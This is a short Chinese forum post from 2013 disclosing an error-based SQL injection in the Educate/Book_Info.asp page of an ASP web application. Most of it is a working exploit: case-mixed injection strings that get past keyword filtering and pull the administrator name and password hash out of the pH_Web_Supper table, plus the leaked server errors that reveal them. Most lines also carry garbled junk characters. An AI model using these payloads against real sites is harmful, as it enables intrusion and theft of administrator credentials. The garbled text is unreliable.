漏洞出现在Educate/Book_Info.asp
5 r' C% }) k( M3 i* P. p3 e! e此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
+ }; t2 g) O6 E- G4 \; a5 w* v/ jexp:如下' Z9 {9 G# w6 y# l
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
- v1 E0 \0 k7 Z! ~1 ^0 s查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) V4 `1 e& ^5 \) [
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
* ]2 G9 F% E- A0 XMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
' v6 }; R( ]6 t, K) B将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。% L) Q, U, e/ d
/Educate/Book_Info.asp,行 82 k' U( }3 |$ I9 h- G
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
* ~' U! Y5 A4 }8 z. ^+ _: aMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
8 ?2 I- p, V4 e+ n( p" n将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
. l$ @) F0 N N% X/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对